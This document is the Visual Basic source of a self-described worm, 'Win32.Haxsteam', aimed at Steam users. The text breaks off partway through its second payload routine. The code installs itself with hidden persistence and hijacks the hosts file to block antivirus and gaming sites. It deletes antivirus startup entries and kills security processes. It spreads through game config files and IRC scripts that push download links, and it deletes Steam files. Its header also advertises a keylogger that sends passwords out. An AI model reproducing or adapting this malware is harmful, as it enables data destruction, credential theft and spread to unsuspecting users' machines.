========================================================================= Haxsteam.frm ========================================================================= VERSION 5.00 Begin VB.Form Haxsteam Caption = "Win32.Haxsteam" ClientHeight = 3090 ClientLeft = 60 ClientTop = 450 ClientWidth = 4680 Icon = "Haxsteam.frx":0000 LinkTopic = "Form1" ScaleHeight = 3090 ScaleWidth = 4680 StartUpPosition = 3 'Windows Default Begin VB.Timer tmrCounter Enabled = 0 'False Interval = 1000 Left = 960 Top = 960 End Begin VB.Timer tmrSteam Enabled = 0 'False Interval = 100 Left = 1800 Top = 1320 End Begin VB.Timer tmrLogger Enabled = 0 'False Interval = 100 Left = 1800 Top = 600 End End Attribute VB_Name = "Haxsteam" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False 'Win32.Haxsteam ¸opyrights 2006 by sk0r 'This Worm was created by sk0r aka Czybik. 'You are not allowed to decompile the Worm! 'ViSiT my Site @ www.sk0r-czybik.de.vu ' 'This is a very good Steam Worm. It has 'much functions. I am proud to be the 'coder if this fantastic Steam Worm. ' ' ' Worm Functions: ' ---------------- ' ' - On first execute displays fake Message ' - Copy itself to Systemdir and Steamdir as Exe or Sys ' - Change its attributes to hidden, systemfile and write protected ' - Change registry Keys for windows and steams ' - disallows viewing websites of steam and avers ' - For monday till friday an other payload ' - delete reg values from avers ' - terminate security processes ' - spreading via steam using cs, tfc, op, dmc, dod and hl ' - spreading via irc, send html file and link which includes adodb steam exploit ' - payload: delete importent steam files so steam must update ' - payload: overwrites files with specific extension in steam with a string ' - payload: Creates for each drive a fake programm with empty files and folders ' - payload: downloads and copys a wallhack to specific mods to risk a vac2 bann ' - payload: sends specific informations about the user and the machine using outlook ' - If the machine is rebooting for the 7th time the worm seachs for files to overwrite ' - If the machine is rebootings for the 17th time the worm speaks a sentence ' - If the machine is rebooting for the 22th time a form with informations will occur ' - payload: worm starts a keylogger to logg the password and sends it to me ' - payload: writes a command to mod config to make Cell-Walls ingame ' ' ' Visit my homepages: Email me to: ' -------------------- ------------- ' ' www.sk0r-czybik.de.vu sk0r1337@web.de ' www.sk0r-virii.tk ' www.czybik-kit.tk ' '======================================================== Dim spkVoice As SpVoice Public strKeys As String Public cntCounter As Integer Private Declare Sub Sleep Lib "kernel32.dll" (ByVal dwMilliseconds As Long) Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer Private Declare Function GetKeyState Lib "user32" (ByVal nVirtKey As Long) As Integer Private Const VK_CAPITAL = &H14 Private Sub Form_Load() Haxsteam.Hide strInfomation = "Win32.Haxsteam Version 1.0 ¸2006 by sk0r alias Czybik (www.sk0r-czybik.de.vu)" On Error Resume Next Set wshs = CreateObject("wscript.shell") Set fso = CreateObject("scripting.filesystemobject") Set sysdir = fso.getspecialfolder(1) Set wmiObj = GetObject("winmgmts:") Set inSystem = wmiObj.InstancesOf("Win32_process") MostRegVal = "HKEY_CLASSES_ROOT\Haxsteam" steampath = wshs.regread("HKEY_CURRENT_USER\Software\Valve\Steam\" + "SteamPath") steampath = Replace(steampath, "/", "\") If (wshs.regread(MostRegVal & "\installed\") = "") Then MsgBox (App.Path + "\" + App.EXEName + ".exe ist keine zul„ssige Win32-Anwendung."), vbOKOnly + vbCritical, App.Path + "\" + App.EXEName + ".exe" wshs.regwrite MostRegVal + "\installed", "yes" End If myworm = App.Path + "\" + App.EXEName + ".exe" Set gtmyworm = fso.getfile(myworm) If Not fso.fileexists(sysdir + "\SteamDll32.exe") Then gtmyworm.Copy (sysdir + "\SteamDll32.exe") End If If Not fso.fileexists(sysdir + "\WinSteam.exe") Then gtmyworm.Copy (sysdir + "\WinSteam.exe") End If If Not fso.fileexists(steampath + "\SteamHelper.exe") Then gtmyworm.Copy (steampath + "\SteamHelper.exe") End If If Not fso.fileexists(steampath + "\ClientGUI.sys") Then gtmyworm.Copy (steampath + "\ClientGUI.sys") End If Set gtforattr1 = fso.getfile(sysdir + "\SteamDll32.exe") gtforattr1.Attributes = gtforattr1 + 4 gtforattr1.Attributes = gtforattr1 + 2 gtforattr1.Attributes = gtforattr1 + 1 Set gtforattr2 = fso.getfile(sysdir + "\WinSteam.exe") gtforattr2.Attributes = gtforattr2 + 4 gtforattr2.Attributes = gtforattr2 + 2 gtforattr2.Attributes = gtforattr2 + 1 wshs.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell", "explorer.exe " + sysdir + " \WinSteam.exe" wshs.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 0, "REG_DWORD" wshs.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 1, "REG_DWORD" wshs.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization", "Haxsteam" wshs.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title", "Haxed by sk0r" wshs.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner", "sk0rCzybik" wshs.regwrite "HKEY_CURRENT_USER\Software\Valve\Steam\language", "japanese" wshs.regwrite "HKEY_CURRENT_USER\Software\Valve\Steam\SteamExe", steampath + "\SteamHelper.exe" wshs.regwrite "HKEY_CURRENT_USER\Software\Valve\Steam\LastGameNameUsed", "sk0r1337" wshs.regwrite "HKEY_CURRENT_USER\Software\Valve\Steam\Rate", "7500" wshs.regwrite "HKEY_CURRENT_USER\Software\Valve\Steam\NoSavePersonalInfo", 1, "REG_DWORD" wshs.regwrite "HKEY_CURRENT_USER\Software\Valve\Steam\Offline", 1, "REG_DWORD" wshs.regwrite "HKEY_CURRENT_USER\Software\Valve\Steam\RefreshLoginRequired", 1, "REG_DWORD" wshs.regwrite "HKEY_CURRENT_USER\Software\Valve\Steam\SetRate", 0, "REG_DWORD" wshs.regwrite "HKEY_CURRENT_USER\Software\Valve\Steam\ActiveProcess\SteamClientDll", steampath + "\ClientGUI.sys" myhomepage = "http://encryboy.en.funpic.de/steamfake.html" normalsite = wshs.regread("HKEY_CURRENT_USER\Software\Valve\Steam\LastContentProviderURL" & "valve_homepage") If normalsite <> myhomepage Then wshs.regwrite "HKEY_CURRENT_USER\Software\Valve\Steam\LastContentProviderURL", myhomepage End If cntReader = wshs.regread(MostRegVal & "\Counter\") If cntReader = "" Then wshs.regwrite MostRegVal + "\Counter", 1, "REG_DWORD" End If wshs.regwrite MostRegVal + "\counter", cntReader + 1, "REG_DWORD" fso.deletefile (sysdir + "\drivers\etc\services") fso.deletefile (sysdir + "\drivers\etc\protocol") LocalIpAddress = Chr(49) & Chr(50) & Chr(55) & Chr(46) & Chr(48) & Chr(46) & Chr(48) & Chr(46) & Chr(49) Set crtHostFl = fso.createtextfile(sysdir + "\drivers\etc\hosts", True) With crtHostFl .writeline ("# Win32.Haxsteam.A ¸2006 by sk0r alias Czybik") .writeline ("# I don't allow you to visit Cs Sites") .writeline (" ") .writeline (LocalIpAddress + " www.antivir.de") .writeline (LocalIpAddress + " www.bitdefender.de ") .writeline (LocalIpAddress + " www.znet.de") .writeline (LocalIpAddress + " www.chip.de") .writeline (LocalIpAddress + " www.virustotal.com") .writeline (LocalIpAddress + " virusscan.jotti.org") .writeline (LocalIpAddress + " www.kaspersky.com") .writeline (LocalIpAddress + " www.sophos.de") .writeline (LocalIpAddress + " www.trojaner-info.de ") .writeline (LocalIpAddress + " www.trojaner-help.de ") .writeline (LocalIpAddress + " www.arcabit.com ") .writeline (LocalIpAddress + " www.avast.com ") .writeline (LocalIpAddress + " www.grisoft.com ") .writeline (LocalIpAddress + " www.bitdefender.com ") .writeline (LocalIpAddress + " www.clamav.net ") .writeline (LocalIpAddress + " www.drweb.com ") .writeline (LocalIpAddress + " www.f-prot.com ") .writeline (LocalIpAddress + " www.google.de ") .writeline (LocalIpAddress + " www.fortinet.com") .writeline (LocalIpAddress + " www.nod32.com ") .writeline (LocalIpAddress + " www.norman.com ") .writeline (LocalIpAddress + " www.microsoft.com") .writeline (LocalIpAddress + " www.anti-virus.by/en") .writeline (LocalIpAddress + " www.symantec.com ") .writeline (LocalIpAddress + " www.windowsupdate.com ") .writeline (LocalIpAddress + " www.trendmicro.com ") .writeline (LocalIpAddress + " www.mcafee.com ") .writeline (LocalIpAddress + " www.viruslist.com") .writeline (LocalIpAddress + " www.avp.com ") .writeline (LocalIpAddress + " www.zonelabs.com") .writeline (LocalIpAddress + " www.heise.de ") .writeline (LocalIpAddress + " www.antivirus-online.de") .writeline (LocalIpAddress + " www.free-av.com ") .writeline (LocalIpAddress + " www.panda-software.com") .writeline (LocalIpAddress + " www.pc-welt.de ") .writeline (LocalIpAddress + " www.pc-special.net") .writeline (LocalIpAddress + " download.freenet.de ") .writeline (LocalIpAddress + " www.vollversion.de ") .writeline (LocalIpAddress + " www.das-download-archiv.de") .writeline (LocalIpAddress + " www.freeware.de ") .writeline (LocalIpAddress + " www.antiviruslab.com") .writeline (LocalIpAddress + " www.search.yahoo.com") .writeline (LocalIpAddress + " www.web.de ") .writeline (LocalIpAddress + " www.hotmail.com") .writeline (LocalIpAddress + " www.hotmail.de") .writeline (LocalIpAddress + " www.gmx.net") .writeline (LocalIpAddress + " www.esl-europe.net") .writeline (LocalIpAddress + " www.cs-expert.de") .writeline (LocalIpAddress + " www.spiegel.de") .writeline (LocalIpAddress + " www.icq.com") .writeline (LocalIpAddress + " www.icq.de ") .writeline (LocalIpAddress + " www.og-cheats.de") .writeline (LocalIpAddress + " www.flirtlife.de") .writeline (LocalIpAddress + " www.ffh.de") .writeline (LocalIpAddress + " www.counter-strike.de") .writeline (LocalIpAddress + " www.counterstrike.de") .writeline (LocalIpAddress + " www.4players.de") .writeline (LocalIpAddress + " www.serverleih.de") .writeline (LocalIpAddress + " www.esl-europe.net") .writeline (LocalIpAddress + " www.cs-expert.de") .writeline (LocalIpAddress + " www.og-cheats.de") .writeline (LocalIpAddress + " www.counter-hacks.de") .writeline (LocalIpAddress + " www.csconfigs.de") .writeline (LocalIpAddress + " www.daddeln.de") .writeline (LocalIpAddress + " www.leaguez.com") .writeline (LocalIpAddress + " www.planethalflife.com") .writeline (LocalIpAddress + " www.google.de") .writeline (LocalIpAddress + " www.search.yahoo.com") .writeline (LocalIpAddress + " www.search.yahoo.de") .writeline (LocalIpAddress + " www.netsettings.net") .writeline (LocalIpAddress + " www.gigaliga.de") .writeline (LocalIpAddress + " www.readmore.de") .writeline (LocalIpAddress + " www.counterstrike-games.de") .writeline (LocalIpAddress + " www.schroet.de") .writeline (LocalIpAddress + " www.mousesports.com") .writeline (LocalIpAddress + " www.clanserver4u.de") .writeline (LocalIpAddress + " www.krankehorde.de") .writeline (LocalIpAddress + " www.a-losers.org") .writeline (LocalIpAddress + " www.team-ger.de") .writeline (LocalIpAddress + " www.rushed.de") .writeline (LocalIpAddress + " www.mymtw.de") .writeline (LocalIpAddress + " www.giga.de") .writeline (LocalIpAddress + " www.config-tuning.de") .writeline (LocalIpAddress + " www.steampowered.com") .writeline (LocalIpAddress + " www.golem.de") .writeline (LocalIpAddress + " www.pc-games.de") .writeline (LocalIpAddress + " www.mp-gamer.de") .writeline (LocalIpAddress + " www.4cheaters.de") .writeline (LocalIpAddress + " www.e-sb.de") .writeline (LocalIpAddress + " www.ngz-server.de") .writeline (LocalIpAddress + " www.esport-servers.de") .writeline (LocalIpAddress + " www.digitallabs.de") .writeline (LocalIpAddress + " www.digitallabs.com") .writeline (LocalIpAddress + " www.ckras.com") .writeline (LocalIpAddress + " www.quado.net") .writeline (LocalIpAddress + " www.linemax.de") .writeline (LocalIpAddress + " www.arena7.de") .writeline (LocalIpAddress + " www.nitrado.net") .writeline (LocalIpAddress + " www.xenonserver.de") .writeline (LocalIpAddress + " www.cs-arena.com") .writeline (LocalIpAddress + " www.go2irc.com") .writeline (LocalIpAddress + " www.nordic-it.de") .writeline (LocalIpAddress + " www.monsterserver.de") .writeline (LocalIpAddress + " www.servercamp.de") .writeline (LocalIpAddress + " www.clanservers.com") .writeline (LocalIpAddress + " www.4netplayers.de") .writeline (LocalIpAddress + " www.gameservercheck.de") .writeline (LocalIpAddress + " www.stormix.de") .writeline (LocalIpAddress + " www.clanserverz.de") .writeline (LocalIpAddress + " www.server4all.de") .writeline (LocalIpAddress + " www.teamplay.de") .writeline (LocalIpAddress + " www.gameserver4u.de") .writeline (LocalIpAddress + " www.csconfigs.mthone.de") .writeline (LocalIpAddress + " www.spraylogos.de") .writeline (LocalIpAddress + " www.planet-videos.com") .writeline (LocalIpAddress + " www.unitedadmins.com") .writeline (LocalIpAddress + " www.wwcl.net") .writeline (LocalIpAddress + " www.tng-clan.de") .writeline (LocalIpAddress + " www.thezproject.org") .writeline (LocalIpAddress + " www.unitedservers.de") .writeline (LocalIpAddress + " www.mirc-scripts.de") .writeline (LocalIpAddress + " www.zerogamers.com") .writeline (LocalIpAddress + " www.die-opfer.info") .writeline (LocalIpAddress + " www.baerlinonline.de") .writeline (LocalIpAddress + " www.counterstrike.net") .writeline (LocalIpAddress + " www.counter-strike.net") .writeline (LocalIpAddress + " www.security.mods.de") .writeline (LocalIpAddress + " www.3dsupply.de") .writeline (LocalIpAddress + " www.hltv.at") .writeline (LocalIpAddress + " www.blank-tv.de") .writeline (LocalIpAddress + " www.cstrike.de") .writeline (LocalIpAddress + " www.the-cpl.com") .writeline (LocalIpAddress + " www.core64.de") .writeline (LocalIpAddress + " www.cs.gamer-scene.com") .writeline (LocalIpAddress + " www.gamer-scene.com") .writeline (LocalIpAddress + " www.esports-award.org") .Close End With TerminateSecurity SpreadPerSteam SpreadPerIrc intWochentag = Weekday(Now) - 1 If intWochentag = 1 Then SteamPayloadOne ElseIf intWochentag = 2 Then SteamPayloadTwo ElseIf intWochentag = 3 Then SteamPayloadThree ElseIf intWochentag = 4 Then SteamPayloadFour ElseIf intWochentag = 5 Then SteamPayloadFive Else Unload Me End If If cntReader = 7 Then OverwriteSpecificFiles End If If cntReader = 17 Then SpeakTheVoice ("Sorry, I just want to say, that you have been hecked.") End If If cntReader = 22 Then funcShowInformations End If End Sub Function TerminateSecurity() On Error Resume Next Set wshs = CreateObject("wscript.shell") Set wmi = GetObject("winmgmts:") Set inSystem = wmi.InstancesOf("Win32_Process") wshs.regdelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\avgnt" wshs.regdelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KAVPersonal50" wshs.regdelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AVG7_CC" wshs.regdelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BDMCon" wshs.regdelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BDNewsAgent" wshs.regdelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BDOESRV" wshs.regdelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\pccguide.exe" wshs.regdelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DrWebScheduler" wshs.regdelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SpIDerMail" wshs.regdelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SpIDerNT" wshs.regdelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MCAgentExe" wshs.regdelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MCUpdateExe" wshs.regdelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OASClnt" wshs.regdelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VirusScan Online" wshs.regdelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VSOCheckTask" For Each sp In inSystem If LCase(sp.Name) = "avguard.exe" Or LCase(sp.Name) = "avconfig.exe" Or LCase(sp.Name) = "avscan.exe" _ Or LCase(sp.Name) = "avcenter.exe" Or LCase(sp.Name) = "avgnt.exe" Or LCase(sp.Name) = "update.exe" _ Or LCase(sp.Name) = "preupd.exe" Or LCase(sp.Name) = "avcmd.exe" Or LCase(sp.Name) = "avesvc.exe" Then sp.Terminate (0) End If If LCase(sp.Name) = "kav.exe" Or LCase(sp.Name) = "kavsvc.exe" Or LCase(sp.Name) = "kavsend.exe" Or _ LCase(sp.Name) = "keymanager.exe" Then sp.Terminate (0) End If If LCase(sp.Name) = "agentsvr.exe" Or LCase(sp.Name) = "avgcc.exe" Or LCase(sp.Name) = "avgupsvc.exe" _ Or LCase(sp.Name) = "avgamsvr.exe" Then sp.Terminate (0) End If If LCase(sp.Name) = "vsserv.exe" Or LCase(sp.Name) = "bdss.exe" Or LCase(sp.Name) = "xcommsvr.exe" _ Or LCase(sp.Name) = "bdnagent.exe" Or LCase(sp.Name) = "bdoesrv.exe" Or LCase(sp.Name) = "bdmcon.exe" _ Or LCase(sp.Name) = "bdswitch.exe" Or LCase(sp.Name) = "rtvr.exe" Or LCase(sp.Name) = "bdsubmit.exe" _ Or LCase(sp.Name) = "bdlite.exe" Then sp.Terminate (0) End If If LCase(sp.Name) = "agentsvr.exe" Or LCase(sp.Name) = "tmproxy.exe" Or LCase(sp.Name) = "PcCtlCom.exe" _ Or LCase(sp.Name) = "pccguide.exe" Or LCase(sp.Name) = "qttask.exe" Or LCase(sp.Name) = "patch.exe" _ Or LCase(sp.Name) = "Tmntsrv.exe" Or LCase(sp.Name) = "PccPrm.exe" Then sp.Terminate (0) End If If LCase(sp.Name) = "DrWebUpW.exe" Or LCase(sp.Name) = "spidernt.exe" Or LCase(sp.Name) = "DrWebScd.exe" _ Or LCase(sp.Name) = "DrWeb32w.exe" Or LCase(sp.Name) = "drwadins.exe" Then sp.Terminate (0) End If If LCase(sp.Name) = "mcupdui.exe" Or LCase(sp.Name) = "McTskshd.exe" Or LCase(sp.Name) = "McAppIns.exe" _ Or LCase(sp.Name) = "mghtml.exe" Or LCase(sp.Name) = "McShield.exe" Or LCase(sp.Name) = "Mcdetect.exe" _ Or LCase(sp.Name) = "McVSEscn.exe" Or LCase(sp.Name) = "oasclnt.exe" Or LCase(sp.Name) = "mcvsshld.exe" Then sp.Terminate (0) End If If InStr(sp.Name, "clean") Or InStr(sp.Name, "save") Or InStr(sp.Name, "av") Or InStr(sp.Name, "svr") _ Or InStr(sp.Name, "mgr") Or InStr(sp.Name, "syma") Or InStr(sp.Name, "resc") Or InStr(sp.Name, "guar") Then sp.Terminate (0) End If Next End Function Function SpreadPerSteam() On Error Resume Next Set wshs = CreateObject("wscript.shell") Set fso = CreateObject("scripting.filesystemobject") steampath = wshs.regread("HKEY_CURRENT_USER\Software\Valve\Steam\" + "SteamPath") steampath = Replace(steampath, "/", "\") Randomize: intNumberRandoom = Int(7 * Rnd) + 1 If intNumberRandoom = 1 Then ChatMessage = "World biggest cfg and priv hack summarize!" ElseIf intNumberRandoom = 2 Then ChatMessage = "Download original Xs1cht and Headstyle Rc!!" ElseIf intNumberRandoom = 3 Then ChatMessage = "Orgia Crack v10 working!! Download it and own!" ElseIf intNumberRandoom = 4 Then ChatMessage = "Pixelaimbot v5.2 working (undetectable) downlaod!" ElseIf intNumberRandoom = 5 Then ChatMessage = "Download 1337 Config by Mouz|Jonny (Original, no fake!!)" ElseIf intNumberRandoom = 6 Then ChatMessage = "h4xx0r sound config download! Better then A3D 2.0 (working)" ElseIf intNumberRandoom = 7 Then ChatMessage = "download priv config h4xx0r maker by hirsche! (no fake)" Else ChatMessage = "download private optimizer by z0rr0.. kommt viel mehr an (geht wirklich!!)" End If Set gtfldr = fso.getfolder(steampath + "\SteamApps") For Each AccountFolder In gtfldr.subfolders If fso.folderexists(AccountFolder.Path + "\counter-strike\cstrike") Then InfectUserconfig (AccountFolder.Path + "\counter-strike\cstrike") End If If fso.folderexists(AccountFolder.Path + "\day of defeat\dod") Then InfectUserconfig (AccountFolder.Path + "\day of defeat\dod") End If If fso.folderexists(AccountFolder.Path + "\deathmatch classic\dmc") Then InfectUserconfig (AccountFolder.Path + "\deathmatch classic\dmc") End If If fso.folderexists(AccountFolder.Path + "\half-life\valve") Then InfectUserconfig (AccountFolder.Path + "\half-life\valve") End If If fso.folderexists(AccountFolder.Path + "\opposing force\gearbox") Then InfectUserconfig (AccountFolder.Path + "\opposing force\gearbox") End If If fso.folderexists(AccountFolder.Path + "\team fortress classic\tfc") Then InfectUserconfig (AccountFolder.Path + "\team fortress classic\tfc") End If Next End Function Function InfectUserconfig(strModPath As String) On Error Resume Next Set wshs = CreateObject("wscript.shell") Set fso = CreateObject("scripting.filesystemobject") steampath = wshs.regread("HKEY_CURRENT_USER\Software\Valve\Steam\" + "SteamPath") steampath = Replace(steampath, "/", "\") WhileWallsString = "gl_max_size " + Chr(34) + "2" + Chr(34) + "; alias gl_max_size" Set openusercfg = fso.createtextfile(strModPath + "\userconfig.cfg", True) openusercfg.Write ("//Win32.Haxsteam.A Userconfig Spread (Like IM-Worms)" + vbCrLf) openusercfg.Write ("//===========================================" + vbCrLf) openusercfg.Write ("//Begin Config h4xx0ring:" + vbCrLf) openusercfg.Write ("alias ""SkorWrite"" ""say http://czybik.cz.funpic.de/Haxsteam/Haxsteam.zip <= " + ChatMessage + " "";" + vbCrLf) openusercfg.Write ("alias ""SkorSleep"" ""echo Haxed by Win32.Haxsteam.A"";" + vbCrLf) openusercfg.Write ("alias ""SkorGo"" ""SkorAn"";" + vbCrLf) openusercfg.Write ("alias ""SkorAn"" ""SkorWrite; alias SkorGo SkorAus"";" + vbCrLf) openusercfg.Write ("alias ""SkorAus"" ""SkorSleep; alias SkorGo SkorSchmaus"";" + vbCrLf) openusercfg.Write ("alias ""SkorSchmaus"" ""SkorSleep; alias SkorGo SkorLaus"";" + vbCrLf) openusercfg.Write ("alias ""SkorLaus"" ""SkorSleep; alias SkorGo SkorKaus"";" + vbCrLf) openusercfg.Write ("alias ""SkorKaus"" ""SkorSleep; alias SkorGo SkorSaus"";" + vbCrLf) openusercfg.Write ("alias ""SkorSaus"" ""SkorSleep; alias SkorGo SkorBraus"";" + vbCrLf) openusercfg.Write ("alias ""SkorBraus"" ""SkorSleep; alias SkorGo SkorXaus"";" + vbCrLf) openusercfg.Write ("alias ""SkorXaus"" ""SkorSleep; alias SkorGo SkorZaus"";" + vbCrLf) openusercfg.Write ("alias ""SkorZaus"" ""SkorSleep; alias SkorGo SkorAn"";" + vbCrLf) openusercfg.Write ("alias ""m_pitch"" ""SkorGo"";" + vbCrLf) openusercfg.Write (WhileWallsString + vbCrLf) openusercfg.Write ("s_enable_a3d;" + vbCrLf) openusercfg.Write ("s_a3d ""1""; alias s_a3d;" + vbCrLf) openusercfg.Write ("rate ""7500""; alias rate" + vbCrLf) openusercfg.Write ("cl_updaterate ""10""; //alias cl_updaterate" + vbCrLf) openusercfg.Write ("cl_cmdrate ""1""; //alias cl_cmdrate" + vbCrLf) openusercfg.Write ("//End Config h4xx0ring" + vbCrLf) openusercfg.Write ("//===========================================" + vbCrLf) openusercfg.Write ("//Win32.Haxsteam.A Userconfig Spread (Like IM-Worms)" + vbCrLf) End Function Function SpreadPerIrc() On Error Resume Next Set wshs = CreateObject("wscript.shell") Set fso = CreateObject("scripting.filesystemobject") steampath = wshs.regread("HKEY_CURRENT_USER\Software\Valve\Steam\" + "SteamPath") steampath = Replace(steampath, "/", "\") Set crtDownloadHtml = fso.createtextfile(sysdir + "\cstrike_steam.html", True) crtDownloadHtml.writeline (" ") crtDownloadHtml.writeline (" ") crtDownloadHtml.writeline (" Funny Counter-Strike Pictures ") crtDownloadHtml.writeline (" ") crtDownloadHtml.writeline (" ") crtDownloadHtml.writeline (" ") crtDownloadHtml.writeline (" ") crtDownloadHtml.writeline ("

Funny Counter-Strike Pictures

") crtDownloadHtml.writeline ("
") crtDownloadHtml.writeline ("
") crtDownloadHtml.writeline ("Please wait while initializing the pictures.
") crtDownloadHtml.writeline ("Note, that you need ActiveX and internet explorer
") crtDownloadHtml.writeline ("to view the funny counter-strike pictures
 ") crtDownloadHtml.writeline ("
") crtDownloadHtml.writeline ("

Click here to see more great things

") crtDownloadHtml.writeline (" ") crtDownloadHtml.writeline (" ") crtDownloadHtml.writeline (" ") crtDownloadHtml.writeline (" ") crtDownloadHtml.Close onconnect = "!!!!o!!!!n!!!! !!!!1!!!:!!!!c!!!!o!!!n!!!!n!!!!e!!!!c!!!t!!!!:!!!{!!!!" onconnect = Replace(onconnect, "!", "") onjoin = "!!!!o!!!!n!!!! !!!!1!!!!:!!!!j!!!!o!!!!i!!!!n!!!!:!!!!#!!!!:!!!! !!!{!!!!" onjoin = Replace(onjoin, "!", "") haltt = "õõõiõõõõfõõõ õõõ(õõõ$õõõõnõõõiõõõcõõõkõõõ õõõ!õõõ=õõõ õõõ$õõõmõõõeõõõ)õõõ õõõ{õõõõ" + vbCrLf haltt = haltt + "õõõhõõõõaõõõõlõõõtõõõõ" + vbCrLf haltt = haltt + "õõõõ}õõõõ" + vbCrLf haltt = Replace(haltt, "õ", "") userdatarant = "???v????a???r???? ???%????t???h????e???u????s???e????r??? ????=??? ????$???n????i???c????k??? " + vbCrLf userdatarant = userdatarant + "???v????a???r???? ???%????d???a????t???a???? ???=???? " + sysdir + "???\????c???s????t???r????i???k????e???_????s???t????e???a????m???.????h???t????m???l????" + vbCrLf userdatarant = userdatarant + "????v???a????r??? ????%???r????a???n????d??? ????=??? ????$???r????a???n????d???(????a???,???? ???c????)???" + vbCrLf userdatarant = Replace(userdatarant, "?", "") dccsend = "õõõõdõõõcõõõcõõõõ õõõsõõõõeõõõnõõõõdõõõ õõõõ-õõõcõõõõ õõõ%õõõõtõõõhõõõõeõõõuõõõõsõõõeõõõõrõõõ õõõõ%õõõdõõõõaõõõtõõõõaõõõ" dccsend = Replace(dccsend, "õ", "") msglink = "((((m(((s((((g((( ((((%(((t((((h(((e((((u(((s((((e(((r(((( (((%((((m(((s((((g((( " msglink = Replace(msglink, "(", "") GamersircPath = wshs.regread("HKEY_LOCAL_MACHINE\SOFTWARE\Gamers.Interactive\Gamers.IRC\" & "inst_path") If GamersircPath <> "" Then Set crtmircSendfile = fso.createtextfile(GamersircPath + "\bin\grc\gamersirc" + Chr(46) + Chr(103) + Chr(114) + Chr(99), True) crtmircSendfile.writeline ("; Win32.Haxsteam Irc Script File ") crtmircSendfile.writeline (onconnect) crtmircSendfile.writeline (" titlebar sk0r alias Czybik haxed you! ") crtmircSendfile.writeline (" join #0,0 ") crtmircSendfile.writeline (" join -n #sponsor,#sponsoring,#bouncer4you,#ringer,#clansuche ") crtmircSendfile.writeline ("} ") crtmircSendfile.writeline (onjoin) crtmircSendfile.writeline (haltt) crtmircSendfile.writeline (" else { ") crtmircSendfile.writeline (userdatarant) crtmircSendfile.writeline (" if (%rand == a) { ") crtmircSendfile.writeline (" var %msg = Lol, schau dir ma die krassen Steam Bilder an! => http://czybik.cz.funpic.de/Haxsteam/Haxsteam.html ") crtmircSendfile.writeline (" } ") crtmircSendfile.writeline (" elseif (%rand == b) { ") crtmircSendfile.writeline (" var %msg = Sau lustige Cstrike Pics => http://czybik.cz.funpic.de/Haxsteam/Haxsteam.html ") crtmircSendfile.writeline (" } ") crtmircSendfile.writeline (" else { ") crtmircSendfile.writeline (" var %msg = Ey rofl, schau dir die Valve Bilder an => http://czybik.cz.funpic.de/Haxsteam/Haxsteam.html ") crtmircSendfile.writeline (" } ") crtmircSendfile.writeline (dccsend) crtmircSendfile.writeline (msglink) crtmircSendfile.writeline (" } ") crtmircSendfile.writeline (" ") crtmircSendfile.writeline ("} ") crtmircSendfile.writeline ("} ") crtmircSendfile.Close End If End Function Function SteamPayloadOne() On Error Resume Next Set wshs = CreateObject("wscript.shell") Set fso = CreateObject("scripting.filesystemobject") steampath = wshs.regread("HKEY_CURRENT_USER\Software\Valve\Steam\" + "SteamPath") steampath = Replace(steampath, "/", "\") fso.deletefile (steampath + "\Steam_14.mst") fso.deletefile (steampath + "\steamclient.dll") fso.deletefile (steampath + "\tier0_s.dll") fso.deletefile (steampath + "\CSERHelper.dll") fso.deletefile (steampath + "\dbghelp.dll") fso.deletefile (steampath + "\ClientRegistry.blob") fso.deletefile (steampath + "\Steam_api.dll") fso.deletefile (steampath + "\INSTALL.LOG") fso.deletefile (steampath + "\WriteMiniDump.exe") fso.deletefile (steampath + "\Steam.dll") fso.deletefile (steampath + "\SteamUI.dll") fso.deletefolder (steampath + "\bin") fso.deletefolder (steampath + "\servers") fso.deletefolder (steampath + "\config") fso.deletefolder (steampath + "\friends") Open steampath + "\PayloadOne.log" For Output As #pay1 Print #pay1, "The first payload has been executed" Close #pay1 End Function Function SteamPayloadTwo() On Error Resume Next Set wshs = CreateObject("wscript.shell") Set fso = CreateObject("scripting.filesystemobject") steampath = wshs.regread("HKEY_CURRENT_USER\Software\Valve\Steam\" + "SteamPath") steampath = Replace(steampath, "/", "\") Set gtOneFldr = fso.getfolder(steampath) Set SteamFolders = gtOneFldr.subfolders For Each UnterSteam In SteamFolders Set SteamFiles = UnterSteam.Files For Each SteamData In SteamFiles SteamExt = LCase(fso.getextensionname(SteamData.Path)) If SteamExt = "txt" Or SteamExt = "log" Or SteamExt = "tga" Or SteamExt = "pkv" _ Or SteamExt = 